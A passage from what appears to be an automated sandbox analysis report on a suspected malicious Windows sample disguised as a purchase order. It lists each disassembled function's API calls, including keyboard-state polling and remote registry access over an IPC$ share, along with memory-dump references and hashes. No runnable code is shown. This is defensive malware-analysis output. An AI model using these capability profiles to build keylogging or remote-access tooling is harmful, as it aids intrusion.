                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                            Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                            Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                            • DeleteObject.GDI32(?), ref: 0047151E
                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                            • DeleteObject.GDI32(?), ref: 004715EA
                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                            • String ID:
                                                            • API String ID: 3218148540-0
                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                            Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                            • String ID:
                                                            • API String ID: 136442275-0
                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                            Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcstok.LIBCMT ref: 004674FF
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcstok.LIBCMT ref: 004675B2
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                            • String ID: X
                                                            • API String ID: 3104067586-3081909835
                                                            • Opcode ID: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                            • Opcode Fuzzy Hash: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                            Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 440038798-2785691316
                                                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                            Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                            • _wcslen.LIBCMT ref: 004610A3
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                            • GetWindowRect.USER32(?,?), ref: 00461248
                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 4136854206-1241985126
                                                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                            Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                            • GetClientRect.USER32(?,?), ref: 00471A1A
                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                            • String ID: 2
                                                            • API String ID: 1331449709-450215437
                                                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                            Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                            • API String ID: 3054410614-2561132961
                                                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                            Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 600699880-22481851
                                                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                            Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: static
                                                            • API String ID: 3375834691-2160076837
                                                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                            Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                            • API String ID: 2907320926-3566645568
                                                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                            Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                            • DeleteObject.GDI32(00530000), ref: 00470A04
                                                            • DestroyIcon.USER32(00530045), ref: 00470A1C
                                                            • DeleteObject.GDI32(1DAA3C26), ref: 00470A34
